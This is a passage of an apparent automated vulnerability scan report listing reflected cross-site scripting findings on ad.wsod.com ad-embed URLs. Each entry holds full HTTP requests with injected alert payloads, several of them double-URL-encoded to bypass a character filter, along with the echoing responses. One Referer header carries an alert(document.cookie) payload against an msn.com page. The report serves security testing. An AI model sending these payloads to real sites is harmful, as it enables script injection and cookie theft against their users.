<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250bf329";alert(1)//8550b302086/1296351650**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.59. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 677e0"-alert(1)-"d0d500f82e2 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number?click=Insert_Click_Track_URL677e0"-alert(1)-"d0d500f82e2 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:39:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1556

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
ype="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296351588**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=Insert_Click_Track_URL677e0"-alert(1)-"d0d500f82e2">
...[SNIP]...

5.60. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14771"-alert(1)-"6bc375b9650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number?click=Insert_Click_Track_URL&14771"-alert(1)-"6bc375b9650=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1559

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
pe="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296351623**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=Insert_Click_Track_URL&14771"-alert(1)-"6bc375b9650=1">
...[SNIP]...

5.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce8c8"-alert(1)-"ef2d57917af was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235ce8c8"-alert(1)-"ef2d57917af&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
to+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296398960**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235ce8c8"-alert(1)-"ef2d57917af&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a">
...[SNIP]...

5.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88ae9"-alert(1)-"90a9ad5ee9c was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=111050813788ae9"-alert(1)-"90a9ad5ee9c&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
d7fd7c0fb6e6a631357/1411.0.js.120x60/1296399017**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=111050813788ae9"-alert(1)-"90a9ad5ee9c&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a">
...[SNIP]...

5.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d219"-alert(1)-"d40e45bc60b was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a3d219"-alert(1)-"d40e45bc60b HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
*;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a3d219"-alert(1)-"d40e45bc60b">
...[SNIP]...

5.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dab6"-alert(1)-"f599f1b3586 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD5dab6"-alert(1)-"f599f1b3586&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
e6a631357/1411.0.js.120x60/1296399026**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD5dab6"-alert(1)-"f599f1b3586&ASID=de8164d050b942d8a816e5fd11a9275a">
...[SNIP]...

5.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba586%2522%253balert%25281%2529%252f%252fa487625405a was submitted in the REST URL parameter 2. This input was echoed as ba586";alert(1)//a487625405a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357ba586%2522%253balert%25281%2529%252f%252fa487625405a/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357ba586";alert(1)//a487625405a/1411.0.js.120x60/1296399087**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8
...[SNIP]...

5.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4698d%2522%253balert%25281%2529%252f%252fa11953fd95 was submitted in the REST URL parameter 3. This input was echoed as 4698d";alert(1)//a11953fd95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x604698d%2522%253balert%25281%2529%252f%252fa11953fd95/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x604698d";alert(1)//a11953fd95/1296399093**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816
...[SNIP]...

5.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdb7c"-alert(1)-"bd1f4188982 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208fdb7c"-alert(1)-"bd1f4188982&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296399002**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208fdb7c"-alert(1)-"bd1f4188982&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a">
...[SNIP]...

5.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59d14"-alert(1)-"17d20a062e9 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G59d14"-alert(1)-"17d20a062e9&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296398983**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G59d14"-alert(1)-"17d20a062e9&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a">
...[SNIP]...

5.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77ac7"-alert(1)-"d6a67b2bc13 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!77ac7"-alert(1)-"d6a67b2bc13&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
